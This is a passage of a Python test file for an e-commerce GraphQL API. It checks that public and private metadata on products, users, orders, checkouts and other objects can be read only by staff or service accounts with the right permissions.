def test_query_public_meta_for_product_type_as_staff(
    staff_api_client, product_type, permission_manage_products
):
    """Product-type public metadata is readable by staff with MANAGE_PRODUCTS."""
    product_type.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    product_type.save(update_fields=["metadata"])
    type_id = graphene.Node.to_global_id("ProductType", product_type.pk)

    response = staff_api_client.post_graphql(
        QUERY_PRODUCT_TYPE_PUBLIC_META,
        {"id": type_id},
        [permission_manage_products],
        check_no_permissions=False,
    )

    entry = get_graphql_content(response)["data"]["productType"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE


def test_query_public_meta_for_product_type_as_service_account(
    service_account_api_client, product_type, permission_manage_products
):
    """Product-type public metadata is readable by a privileged service account."""
    product_type.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    product_type.save(update_fields=["metadata"])
    type_id = graphene.Node.to_global_id("ProductType", product_type.pk)

    response = service_account_api_client.post_graphql(
        QUERY_PRODUCT_TYPE_PUBLIC_META,
        {"id": type_id},
        [permission_manage_products],
        check_no_permissions=False,
    )

    entry = get_graphql_content(response)["data"]["productType"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE
QUERY_PRODUCT_VARIANT_PUBLIC_META = """
query productVariantMeta($id: ID!){
productVariant(id: $id){
metadata{
key
value
}
}
}
"""
def test_query_public_meta_for_product_variant_as_anonymous_user(api_client, variant):
    """Variant public metadata is readable without authentication."""
    variant.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    variant.save(update_fields=["metadata"])
    variant_id = graphene.Node.to_global_id("ProductVariant", variant.pk)

    response = api_client.post_graphql(
        QUERY_PRODUCT_VARIANT_PUBLIC_META, {"id": variant_id}
    )

    entry = get_graphql_content(response)["data"]["productVariant"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE


def test_query_public_meta_for_product_variant_as_customer(user_api_client, variant):
    """Variant public metadata is readable by a logged-in customer."""
    variant.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    variant.save(update_fields=["metadata"])
    variant_id = graphene.Node.to_global_id("ProductVariant", variant.pk)

    response = user_api_client.post_graphql(
        QUERY_PRODUCT_VARIANT_PUBLIC_META, {"id": variant_id}
    )

    entry = get_graphql_content(response)["data"]["productVariant"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE


def test_query_public_meta_for_product_variant_as_staff(
    staff_api_client, variant, permission_manage_products
):
    """Variant public metadata is readable by staff with MANAGE_PRODUCTS."""
    variant.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    variant.save(update_fields=["metadata"])
    variant_id = graphene.Node.to_global_id("ProductVariant", variant.pk)

    response = staff_api_client.post_graphql(
        QUERY_PRODUCT_VARIANT_PUBLIC_META,
        {"id": variant_id},
        [permission_manage_products],
        check_no_permissions=False,
    )

    entry = get_graphql_content(response)["data"]["productVariant"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE


def test_query_public_meta_for_product_variant_as_service_account(
    service_account_api_client, variant, permission_manage_products
):
    """Variant public metadata is readable by a privileged service account."""
    variant.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    variant.save(update_fields=["metadata"])
    variant_id = graphene.Node.to_global_id("ProductVariant", variant.pk)

    response = service_account_api_client.post_graphql(
        QUERY_PRODUCT_VARIANT_PUBLIC_META,
        {"id": variant_id},
        [permission_manage_products],
        check_no_permissions=False,
    )

    entry = get_graphql_content(response)["data"]["productVariant"]["metadata"][0]
    assert entry["key"] == PUBLIC_KEY
    assert entry["value"] == PUBLIC_VALUE
QUERY_SERVICE_ACCOUNT_PUBLIC_META = """
    query serviceAccountMeta($id: ID!){
        serviceAccount(id: $id){
            metadata{
                key
                value
            }
        }
    }
"""


def test_query_public_meta_for_service_account_as_anonymous_user(
    api_client, service_account
):
    """Anonymous users may not query service account metadata."""
    # given
    account_id = graphene.Node.to_global_id("ServiceAccount", service_account.pk)

    # when
    response = api_client.post_graphql(
        QUERY_SERVICE_ACCOUNT_PUBLIC_META, {"id": account_id}
    )

    # then
    assert_no_permission(response)


def test_query_public_meta_for_service_account_as_customer(
    user_api_client, service_account
):
    """Customers may not query service account metadata."""
    # given
    account_id = graphene.Node.to_global_id("ServiceAccount", service_account.pk)

    # when
    response = user_api_client.post_graphql(
        QUERY_SERVICE_ACCOUNT_PUBLIC_META, {"id": account_id}
    )

    # then
    assert_no_permission(response)


def test_query_public_meta_for_service_account_as_staff(
    staff_api_client, service_account, permission_manage_service_accounts
):
    """Staff with service-account permissions can read service account metadata."""
    # given
    service_account.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    service_account.save(update_fields=["metadata"])
    account_id = graphene.Node.to_global_id("ServiceAccount", service_account.pk)

    # when
    response = staff_api_client.post_graphql(
        QUERY_SERVICE_ACCOUNT_PUBLIC_META,
        {"id": account_id},
        [permission_manage_service_accounts],
        check_no_permissions=False,
    )

    # then
    item = get_graphql_content(response)["data"]["serviceAccount"]["metadata"][0]
    assert item["key"] == PUBLIC_KEY
    assert item["value"] == PUBLIC_VALUE


def test_query_public_meta_for_service_account_as_service_account(
    service_account_api_client, service_account, permission_manage_service_accounts
):
    """Service accounts with the right permission can read service account metadata."""
    # given
    service_account.store_value_in_metadata({PUBLIC_KEY: PUBLIC_VALUE})
    service_account.save(update_fields=["metadata"])
    account_id = graphene.Node.to_global_id("ServiceAccount", service_account.pk)

    # when
    response = service_account_api_client.post_graphql(
        QUERY_SERVICE_ACCOUNT_PUBLIC_META,
        {"id": account_id},
        [permission_manage_service_accounts],
        check_no_permissions=False,
    )

    # then
    item = get_graphql_content(response)["data"]["serviceAccount"]["metadata"][0]
    assert item["key"] == PUBLIC_KEY
    assert item["value"] == PUBLIC_VALUE
QUERY_SELF_PRIVATE_META = """
    {
        me{
            privateMetadata{
                key
                value
            }
        }
    }
"""


def test_query_private_meta_for_me_as_customer(user_api_client):
    """Customers may not read their own private metadata."""
    # when
    response = user_api_client.post_graphql(QUERY_SELF_PRIVATE_META)

    # then
    assert_no_permission(response)


def test_query_private_meta_for_me_as_staff_with_manage_customer(
    staff_api_client, permission_manage_users
):
    """Manage-users permission alone does not grant access to own private metadata."""
    # when
    response = staff_api_client.post_graphql(
        QUERY_SELF_PRIVATE_META, None, [permission_manage_users]
    )

    # then
    assert_no_permission(response)


def test_query_private_meta_for_me_as_staff_with_manage_staff(
    staff_api_client, permission_manage_staff
):
    """Staff with manage-staff permission can read their own private metadata."""
    # given
    current_user = staff_api_client.user
    current_user.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    current_user.save(update_fields=["private_metadata"])

    # when
    response = staff_api_client.post_graphql(
        QUERY_SELF_PRIVATE_META, None, [permission_manage_staff]
    )

    # then
    item = get_graphql_content(response)["data"]["me"]["privateMetadata"][0]
    assert item["key"] == PRIVATE_KEY
    assert item["value"] == PRIVATE_VALUE
QUERY_USER_PRIVATE_META = """
    query userMeta($id: ID!){
        user(id: $id){
            privateMetadata{
                key
                value
            }
        }
    }
"""


def test_query_private_meta_for_customer_as_staff(
    staff_api_client, permission_manage_users, customer_user
):
    """Staff with manage-users permission can read a customer's private metadata."""
    # given
    customer_user.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    customer_user.save(update_fields=["private_metadata"])
    user_id = graphene.Node.to_global_id("User", customer_user.pk)

    # when
    response = staff_api_client.post_graphql(
        QUERY_USER_PRIVATE_META, {"id": user_id}, [permission_manage_users]
    )

    # then
    item = get_graphql_content(response)["data"]["user"]["privateMetadata"][0]
    assert item["key"] == PRIVATE_KEY
    assert item["value"] == PRIVATE_VALUE


def test_query_private_meta_for_customer_as_service_account(
    service_account_api_client, permission_manage_users, customer_user
):
    """Service accounts with manage-users permission can read a customer's private metadata."""
    # given
    customer_user.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    customer_user.save(update_fields=["private_metadata"])
    user_id = graphene.Node.to_global_id("User", customer_user.pk)

    # when
    response = service_account_api_client.post_graphql(
        QUERY_USER_PRIVATE_META, {"id": user_id}, [permission_manage_users]
    )

    # then
    item = get_graphql_content(response)["data"]["user"]["privateMetadata"][0]
    assert item["key"] == PRIVATE_KEY
    assert item["value"] == PRIVATE_VALUE


def test_query_private_meta_for_staff_as_other_staff(
    staff_api_client, permission_manage_staff, admin_user
):
    """Staff with manage-staff permission can read another staff member's private metadata."""
    # given
    admin_user.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    admin_user.save(update_fields=["private_metadata"])
    user_id = graphene.Node.to_global_id("User", admin_user.pk)

    # when
    response = staff_api_client.post_graphql(
        QUERY_USER_PRIVATE_META, {"id": user_id}, [permission_manage_staff]
    )

    # then
    item = get_graphql_content(response)["data"]["user"]["privateMetadata"][0]
    assert item["key"] == PRIVATE_KEY
    assert item["value"] == PRIVATE_VALUE


def test_query_private_meta_for_staff_as_service_account(
    service_account_api_client, permission_manage_staff, admin_user
):
    """Service accounts with manage-staff permission can read staff private metadata."""
    # given
    admin_user.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    admin_user.save(update_fields=["private_metadata"])
    user_id = graphene.Node.to_global_id("User", admin_user.pk)

    # when
    response = service_account_api_client.post_graphql(
        QUERY_USER_PRIVATE_META, {"id": user_id}, [permission_manage_staff]
    )

    # then
    item = get_graphql_content(response)["data"]["user"]["privateMetadata"][0]
    assert item["key"] == PRIVATE_KEY
    assert item["value"] == PRIVATE_VALUE
QUERY_CHECKOUT_PRIVATE_META = """
    query checkoutMeta($token: UUID!){
        checkout(token: $token){
            privateMetadata{
                key
                value
            }
        }
    }
"""


def test_query_private_meta_for_checkout_as_anonymous_user(api_client, checkout):
    """Anonymous users may not read checkout private metadata."""
    # when
    response = api_client.post_graphql(
        QUERY_CHECKOUT_PRIVATE_META, {"token": checkout.pk}
    )

    # then
    assert_no_permission(response)


def test_query_private_meta_for_other_customer_checkout_as_anonymous_user(
    api_client, checkout, customer_user
):
    """A checkout owned by a customer is not visible to anonymous users at all."""
    # given
    checkout.user = customer_user
    checkout.save(update_fields=["user"])

    # when
    response = api_client.post_graphql(
        QUERY_CHECKOUT_PRIVATE_META, {"token": checkout.pk}
    )

    # then
    content = get_graphql_content(response)
    assert not content["data"]["checkout"]


def test_query_private_meta_for_checkout_as_customer(user_api_client, checkout):
    """Even the checkout's owner may not read its private metadata."""
    # given
    checkout.user = user_api_client.user
    checkout.save(update_fields=["user"])

    # when
    response = user_api_client.post_graphql(
        QUERY_CHECKOUT_PRIVATE_META, {"token": checkout.pk}
    )

    # then
    assert_no_permission(response)


def test_query_private_meta_for_checkout_as_staff(
    staff_api_client, checkout, customer_user, permission_manage_checkouts
):
    """Staff with checkout permissions can read checkout private metadata."""
    # given
    checkout.user = customer_user
    checkout.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    checkout.save(update_fields=["user", "private_metadata"])

    # when
    response = staff_api_client.post_graphql(
        QUERY_CHECKOUT_PRIVATE_META,
        {"token": checkout.pk},
        [permission_manage_checkouts],
        check_no_permissions=False,  # Remove after fix #5245
    )

    # then
    item = get_graphql_content(response)["data"]["checkout"]["privateMetadata"][0]
    assert item["key"] == PRIVATE_KEY
    assert item["value"] == PRIVATE_VALUE


def test_query_private_meta_for_checkout_as_service_account(
    service_account_api_client, checkout, customer_user, permission_manage_checkouts
):
    """Service accounts with checkout permissions can read checkout private metadata."""
    # given
    checkout.user = customer_user
    checkout.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    checkout.save(update_fields=["user", "private_metadata"])

    # when
    response = service_account_api_client.post_graphql(
        QUERY_CHECKOUT_PRIVATE_META,
        {"token": checkout.pk},
        [permission_manage_checkouts],
        check_no_permissions=False,  # Remove after fix #5245
    )

    # then
    item = get_graphql_content(response)["data"]["checkout"]["privateMetadata"][0]
    assert item["key"] == PRIVATE_KEY
    assert item["value"] == PRIVATE_VALUE
QUERY_ORDER_BY_TOKEN_PRIVATE_META = """
    query orderMeta($token: UUID!){
        orderByToken(token: $token){
            privateMetadata{
                key
                value
            }
        }
    }
"""


def test_query_private_meta_for_order_by_token_as_anonymous_user(api_client, order):
    """Anonymous users may not read order private metadata by token."""
    # when
    response = api_client.post_graphql(
        QUERY_ORDER_BY_TOKEN_PRIVATE_META, {"token": order.token}
    )

    # then
    assert_no_permission(response)


def test_query_private_meta_for_order_by_token_as_customer(user_api_client, order):
    """Even the order's owner may not read its private metadata by token."""
    # given
    order.user = user_api_client.user
    order.save(update_fields=["user"])

    # when
    response = user_api_client.post_graphql(
        QUERY_ORDER_BY_TOKEN_PRIVATE_META, {"token": order.token}
    )

    # then
    assert_no_permission(response)


def test_query_private_meta_for_order_by_token_as_staff(
    staff_api_client, order, customer_user, permission_manage_orders
):
    """Staff with order permissions can read order private metadata by token."""
    # given
    order.user = customer_user
    order.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    order.save(update_fields=["user", "private_metadata"])

    # when
    response = staff_api_client.post_graphql(
        QUERY_ORDER_BY_TOKEN_PRIVATE_META,
        {"token": order.token},
        [permission_manage_orders],
        check_no_permissions=False,
    )

    # then
    item = get_graphql_content(response)["data"]["orderByToken"]["privateMetadata"][0]
    assert item["key"] == PRIVATE_KEY
    assert item["value"] == PRIVATE_VALUE


def test_query_private_meta_for_order_by_token_as_service_account(
    service_account_api_client, order, customer_user, permission_manage_orders
):
    """Service accounts with order permissions can read order private metadata by token."""
    # given
    order.user = customer_user
    order.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    order.save(update_fields=["user", "private_metadata"])

    # when
    response = service_account_api_client.post_graphql(
        QUERY_ORDER_BY_TOKEN_PRIVATE_META,
        {"token": order.token},
        [permission_manage_orders],
        check_no_permissions=False,
    )

    # then
    item = get_graphql_content(response)["data"]["orderByToken"]["privateMetadata"][0]
    assert item["key"] == PRIVATE_KEY
    assert item["value"] == PRIVATE_VALUE
QUERY_ORDER_PRIVATE_META = """
    query orderMeta($id: ID!){
        order(id: $id){
            privateMetadata{
                key
                value
            }
        }
    }
"""


def test_query_private_meta_for_order_as_anonymous_user(api_client, order):
    """Anonymous users may not read order private metadata."""
    # given
    order_id = graphene.Node.to_global_id("Order", order.pk)

    # when
    response = api_client.post_graphql(QUERY_ORDER_PRIVATE_META, {"id": order_id})

    # then
    assert_no_permission(response)


def test_query_private_meta_for_order_as_customer(user_api_client, order):
    """Even the order's owner may not read its private metadata."""
    # given
    order.user = user_api_client.user
    order.save(update_fields=["user"])
    order_id = graphene.Node.to_global_id("Order", order.pk)

    # when
    response = user_api_client.post_graphql(QUERY_ORDER_PRIVATE_META, {"id": order_id})

    # then
    assert_no_permission(response)


def test_query_private_meta_for_order_as_staff(
    staff_api_client, order, customer_user, permission_manage_orders
):
    """Staff with order permissions can read order private metadata."""
    # given
    order.user = customer_user
    order.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    order.save(update_fields=["user", "private_metadata"])
    order_id = graphene.Node.to_global_id("Order", order.pk)

    # when
    response = staff_api_client.post_graphql(
        QUERY_ORDER_PRIVATE_META,
        {"id": order_id},
        [permission_manage_orders],
        check_no_permissions=False,
    )

    # then
    item = get_graphql_content(response)["data"]["order"]["privateMetadata"][0]
    assert item["key"] == PRIVATE_KEY
    assert item["value"] == PRIVATE_VALUE


def test_query_private_meta_for_order_as_service_account(
    service_account_api_client, order, customer_user, permission_manage_orders
):
    """Service accounts with order permissions can read order private metadata."""
    # given
    order.user = customer_user
    order.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    order.save(update_fields=["user", "private_metadata"])
    order_id = graphene.Node.to_global_id("Order", order.pk)

    # when
    response = service_account_api_client.post_graphql(
        QUERY_ORDER_PRIVATE_META,
        {"id": order_id},
        [permission_manage_orders],
        check_no_permissions=False,
    )

    # then
    item = get_graphql_content(response)["data"]["order"]["privateMetadata"][0]
    assert item["key"] == PRIVATE_KEY
    assert item["value"] == PRIVATE_VALUE
QUERY_DRAFT_ORDER_PRIVATE_META = """
    query draftOrderMeta($id: ID!){
        order(id: $id){
            privateMetadata{
                key
                value
            }
        }
    }
"""


def test_query_private_meta_for_draft_order_as_anonymous_user(api_client, draft_order):
    """Anonymous users may not read draft order private metadata."""
    # given
    variables = {"id": graphene.Node.to_global_id("Order", draft_order.pk)}

    # when
    response = api_client.post_graphql(QUERY_DRAFT_ORDER_PRIVATE_META, variables)

    # then
    assert_no_permission(response)


def test_query_private_meta_for_draft_order_as_customer(user_api_client, draft_order):
    """Even the draft order's owner may not read its private metadata."""
    # given
    draft_order.user = user_api_client.user
    draft_order.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    draft_order.save(update_fields=["user", "private_metadata"])
    variables = {"id": graphene.Node.to_global_id("Order", draft_order.pk)}

    # when
    response = user_api_client.post_graphql(QUERY_DRAFT_ORDER_PRIVATE_META, variables)

    # then
    assert_no_permission(response)


def test_query_private_meta_for_draft_order_as_staff(
    staff_api_client, draft_order, customer_user, permission_manage_orders
):
    """Staff with order permissions can read draft order private metadata."""
    # given
    draft_order.user = customer_user
    draft_order.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    draft_order.save(update_fields=["user", "private_metadata"])
    variables = {"id": graphene.Node.to_global_id("Order", draft_order.pk)}

    # when
    response = staff_api_client.post_graphql(
        QUERY_DRAFT_ORDER_PRIVATE_META,
        variables,
        [permission_manage_orders],
        check_no_permissions=False,
    )
    content = get_graphql_content(response)

    # then
    metadata = content["data"]["order"]["privateMetadata"][0]
    assert metadata["key"] == PRIVATE_KEY
    assert metadata["value"] == PRIVATE_VALUE


def test_query_private_meta_for_draft_order_as_service_account(
    service_account_api_client, draft_order, customer_user, permission_manage_orders
):
    """Service accounts with order permissions can read draft order private metadata."""
    # given
    draft_order.user = customer_user
    draft_order.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    draft_order.save(update_fields=["user", "private_metadata"])
    variables = {"id": graphene.Node.to_global_id("Order", draft_order.pk)}

    # when
    response = service_account_api_client.post_graphql(
        # BUG FIX: this test previously posted QUERY_ORDER_PRIVATE_META; it must
        # exercise the draft-order query constant like its sibling tests.
        QUERY_DRAFT_ORDER_PRIVATE_META,
        variables,
        [permission_manage_orders],
        check_no_permissions=False,
    )
    content = get_graphql_content(response)

    # then
    metadata = content["data"]["order"]["privateMetadata"][0]
    assert metadata["key"] == PRIVATE_KEY
    assert metadata["value"] == PRIVATE_VALUE
QUERY_FULFILLMENT_PRIVATE_META = """
    query fulfillmentMeta($token: UUID!){
        orderByToken(token: $token){
            fulfillments{
                privateMetadata{
                    key
                    value
                }
            }
        }
    }
"""


def test_query_private_meta_for_fulfillment_as_anonymous_user(
    api_client, fulfilled_order
):
    """Anonymous users may not read fulfillment private metadata."""
    # when
    response = api_client.post_graphql(
        QUERY_FULFILLMENT_PRIVATE_META, {"token": fulfilled_order.token}
    )

    # then
    assert_no_permission(response)


def test_query_private_meta_for_fulfillment_as_customer(
    user_api_client, fulfilled_order
):
    """Even the order's owner may not read fulfillment private metadata."""
    # given
    fulfilled_order.user = user_api_client.user
    fulfilled_order.save(update_fields=["user"])

    # when
    response = user_api_client.post_graphql(
        QUERY_FULFILLMENT_PRIVATE_META, {"token": fulfilled_order.token}
    )

    # then
    assert_no_permission(response)


def test_query_private_meta_for_fulfillment_as_staff(
    staff_api_client, fulfilled_order, customer_user, permission_manage_orders
):
    """Staff with order permissions can read fulfillment private metadata."""
    # given
    fulfillment = fulfilled_order.fulfillments.first()
    fulfillment.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    fulfillment.save(update_fields=["private_metadata"])
    fulfilled_order.user = customer_user
    fulfilled_order.save(update_fields=["user"])

    # when
    response = staff_api_client.post_graphql(
        QUERY_FULFILLMENT_PRIVATE_META,
        {"token": fulfilled_order.token},
        [permission_manage_orders],
        check_no_permissions=False,
    )

    # then
    order_data = get_graphql_content(response)["data"]["orderByToken"]
    item = order_data["fulfillments"][0]["privateMetadata"][0]
    assert item["key"] == PRIVATE_KEY
    assert item["value"] == PRIVATE_VALUE


def test_query_private_meta_for_fulfillment_as_service_account(
    service_account_api_client, fulfilled_order, customer_user, permission_manage_orders
):
    """Service accounts with order permissions can read fulfillment private metadata."""
    # given
    fulfillment = fulfilled_order.fulfillments.first()
    fulfillment.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    fulfillment.save(update_fields=["private_metadata"])
    fulfilled_order.user = customer_user
    fulfilled_order.save(update_fields=["user"])

    # when
    response = service_account_api_client.post_graphql(
        QUERY_FULFILLMENT_PRIVATE_META,
        {"token": fulfilled_order.token},
        [permission_manage_orders],
        check_no_permissions=False,
    )

    # then
    order_data = get_graphql_content(response)["data"]["orderByToken"]
    item = order_data["fulfillments"][0]["privateMetadata"][0]
    assert item["key"] == PRIVATE_KEY
    assert item["value"] == PRIVATE_VALUE
QUERY_ATTRIBUTE_PRIVATE_META = """
    query attributeMeta($id: ID!){
        attribute(id: $id){
            privateMetadata{
                key
                value
            }
        }
    }
"""


def test_query_private_meta_for_attribute_as_anonymous_user(
    api_client, color_attribute
):
    """Anonymous users may not read attribute private metadata."""
    # given
    attribute_id = graphene.Node.to_global_id("Attribute", color_attribute.pk)

    # when
    response = api_client.post_graphql(
        QUERY_ATTRIBUTE_PRIVATE_META, {"id": attribute_id}
    )

    # then
    assert_no_permission(response)


def test_query_private_meta_for_attribute_as_customer(user_api_client, color_attribute):
    """Customers may not read attribute private metadata."""
    # given
    attribute_id = graphene.Node.to_global_id("Attribute", color_attribute.pk)

    # when
    response = user_api_client.post_graphql(
        QUERY_ATTRIBUTE_PRIVATE_META, {"id": attribute_id}
    )

    # then
    assert_no_permission(response)


def test_query_private_meta_for_attribute_as_staff(
    staff_api_client, color_attribute, permission_manage_products
):
    """Staff with product permissions can read attribute private metadata."""
    # given
    color_attribute.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    color_attribute.save(update_fields=["private_metadata"])
    attribute_id = graphene.Node.to_global_id("Attribute", color_attribute.pk)

    # when
    response = staff_api_client.post_graphql(
        QUERY_ATTRIBUTE_PRIVATE_META,
        {"id": attribute_id},
        [permission_manage_products],
        check_no_permissions=False,
    )

    # then
    item = get_graphql_content(response)["data"]["attribute"]["privateMetadata"][0]
    assert item["key"] == PRIVATE_KEY
    assert item["value"] == PRIVATE_VALUE


def test_query_private_meta_for_attribute_as_service_account(
    service_account_api_client, color_attribute, permission_manage_products
):
    """Service accounts with product permissions can read attribute private metadata."""
    # given
    color_attribute.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    color_attribute.save(update_fields=["private_metadata"])
    attribute_id = graphene.Node.to_global_id("Attribute", color_attribute.pk)

    # when
    response = service_account_api_client.post_graphql(
        QUERY_ATTRIBUTE_PRIVATE_META,
        {"id": attribute_id},
        [permission_manage_products],
        check_no_permissions=False,
    )

    # then
    item = get_graphql_content(response)["data"]["attribute"]["privateMetadata"][0]
    assert item["key"] == PRIVATE_KEY
    assert item["value"] == PRIVATE_VALUE
QUERY_CATEGORY_PRIVATE_META = """
    query categoryMeta($id: ID!){
        category(id: $id){
            privateMetadata{
                key
                value
            }
        }
    }
"""


def test_query_private_meta_for_category_as_anonymous_user(api_client, category):
    """Anonymous users may not read category private metadata."""
    # given
    category_id = graphene.Node.to_global_id("Category", category.pk)

    # when
    response = api_client.post_graphql(QUERY_CATEGORY_PRIVATE_META, {"id": category_id})

    # then
    assert_no_permission(response)


def test_query_private_meta_for_category_as_customer(user_api_client, category):
    """Customers may not read category private metadata."""
    # given
    category_id = graphene.Node.to_global_id("Category", category.pk)

    # when
    response = user_api_client.post_graphql(
        QUERY_CATEGORY_PRIVATE_META, {"id": category_id}
    )

    # then
    assert_no_permission(response)


def test_query_private_meta_for_category_as_staff(
    staff_api_client, category, permission_manage_products
):
    """Staff with product permissions can read category private metadata."""
    # given
    category.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    category.save(update_fields=["private_metadata"])
    category_id = graphene.Node.to_global_id("Category", category.pk)

    # when
    response = staff_api_client.post_graphql(
        QUERY_CATEGORY_PRIVATE_META,
        {"id": category_id},
        [permission_manage_products],
        check_no_permissions=False,
    )

    # then
    item = get_graphql_content(response)["data"]["category"]["privateMetadata"][0]
    assert item["key"] == PRIVATE_KEY
    assert item["value"] == PRIVATE_VALUE


def test_query_private_meta_for_category_as_service_account(
    service_account_api_client, category, permission_manage_products
):
    """Service accounts with product permissions can read category private metadata."""
    # given
    category.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    category.save(update_fields=["private_metadata"])
    category_id = graphene.Node.to_global_id("Category", category.pk)

    # when
    response = service_account_api_client.post_graphql(
        QUERY_CATEGORY_PRIVATE_META,
        {"id": category_id},
        [permission_manage_products],
        check_no_permissions=False,
    )

    # then
    item = get_graphql_content(response)["data"]["category"]["privateMetadata"][0]
    assert item["key"] == PRIVATE_KEY
    assert item["value"] == PRIVATE_VALUE
QUERY_COLLECTION_PRIVATE_META = """
    query collectionMeta($id: ID!){
        collection(id: $id){
            privateMetadata{
                key
                value
            }
        }
    }
"""


def test_query_private_meta_for_collection_as_anonymous_user(api_client, collection):
    """Anonymous users may not read collection private metadata."""
    # given
    collection_id = graphene.Node.to_global_id("Collection", collection.pk)

    # when
    response = api_client.post_graphql(
        QUERY_COLLECTION_PRIVATE_META, {"id": collection_id}
    )

    # then
    assert_no_permission(response)


def test_query_private_meta_for_collection_as_customer(user_api_client, collection):
    """Customers may not read collection private metadata."""
    # given
    collection_id = graphene.Node.to_global_id("Collection", collection.pk)

    # when
    response = user_api_client.post_graphql(
        QUERY_COLLECTION_PRIVATE_META, {"id": collection_id}
    )

    # then
    assert_no_permission(response)


def test_query_private_meta_for_collection_as_staff(
    staff_api_client, collection, permission_manage_products
):
    """Staff with product permissions can read collection private metadata."""
    # given
    collection.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    collection.save(update_fields=["private_metadata"])
    collection_id = graphene.Node.to_global_id("Collection", collection.pk)

    # when
    response = staff_api_client.post_graphql(
        QUERY_COLLECTION_PRIVATE_META,
        {"id": collection_id},
        [permission_manage_products],
        check_no_permissions=False,
    )

    # then
    item = get_graphql_content(response)["data"]["collection"]["privateMetadata"][0]
    assert item["key"] == PRIVATE_KEY
    assert item["value"] == PRIVATE_VALUE


def test_query_private_meta_for_collection_as_service_account(
    service_account_api_client, collection, permission_manage_products
):
    """Service accounts with product permissions can read collection private metadata."""
    # given
    collection.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    collection.save(update_fields=["private_metadata"])
    collection_id = graphene.Node.to_global_id("Collection", collection.pk)

    # when
    response = service_account_api_client.post_graphql(
        QUERY_COLLECTION_PRIVATE_META,
        {"id": collection_id},
        [permission_manage_products],
        check_no_permissions=False,
    )

    # then
    item = get_graphql_content(response)["data"]["collection"]["privateMetadata"][0]
    assert item["key"] == PRIVATE_KEY
    assert item["value"] == PRIVATE_VALUE
QUERY_DIGITAL_CONTENT_PRIVATE_META = """
    query digitalContentMeta($id: ID!){
        digitalContent(id: $id){
            privateMetadata{
                key
                value
            }
        }
    }
"""


def test_query_private_meta_for_digital_content_as_anonymous_user(
    api_client, digital_content
):
    """Anonymous users may not read digital content private metadata."""
    # given
    content_id = graphene.Node.to_global_id("DigitalContent", digital_content.pk)

    # when
    response = api_client.post_graphql(
        QUERY_DIGITAL_CONTENT_PRIVATE_META, {"id": content_id}
    )

    # then
    assert_no_permission(response)


def test_query_private_meta_for_digital_content_as_customer(
    user_api_client, digital_content
):
    """Customers may not read digital content private metadata."""
    # given
    digital_content.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    digital_content.save(update_fields=["private_metadata"])
    content_id = graphene.Node.to_global_id("DigitalContent", digital_content.pk)

    # when
    response = user_api_client.post_graphql(
        QUERY_DIGITAL_CONTENT_PRIVATE_META, {"id": content_id}
    )

    # then
    assert_no_permission(response)


def test_query_private_meta_for_digital_content_as_staff(
    staff_api_client, digital_content, permission_manage_products
):
    """Staff with product permissions can read digital content private metadata."""
    # given
    digital_content.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    digital_content.save(update_fields=["private_metadata"])
    content_id = graphene.Node.to_global_id("DigitalContent", digital_content.pk)

    # when
    response = staff_api_client.post_graphql(
        QUERY_DIGITAL_CONTENT_PRIVATE_META,
        {"id": content_id},
        [permission_manage_products],
        check_no_permissions=False,
    )

    # then
    item = get_graphql_content(response)["data"]["digitalContent"]["privateMetadata"][0]
    assert item["key"] == PRIVATE_KEY
    assert item["value"] == PRIVATE_VALUE


def test_query_private_meta_for_digital_content_as_service_account(
    service_account_api_client, digital_content, permission_manage_products
):
    """Service accounts with product permissions can read digital content private metadata."""
    # given
    digital_content.store_value_in_private_metadata({PRIVATE_KEY: PRIVATE_VALUE})
    digital_content.save(update_fields=["private_metadata"])
    content_id = graphene.Node.to_global_id("DigitalContent", digital_content.pk)

    # when
    response = service_account_api_client.post_graphql(
        QUERY_DIGITAL_CONTENT_PRIVATE_META,
        {"id": content_id},
        [permission_manage_products],
        check_no_permissions=False,
    )

    # then
    item = get_graphql_content(response)["data"]["digitalContent"]["privateMetadata"][0]
    assert item["key"] == PRIVATE_KEY
    assert item["value"] == PRIVATE_VALUE
QUERY_PRODUCT_PRIVATE_META = """
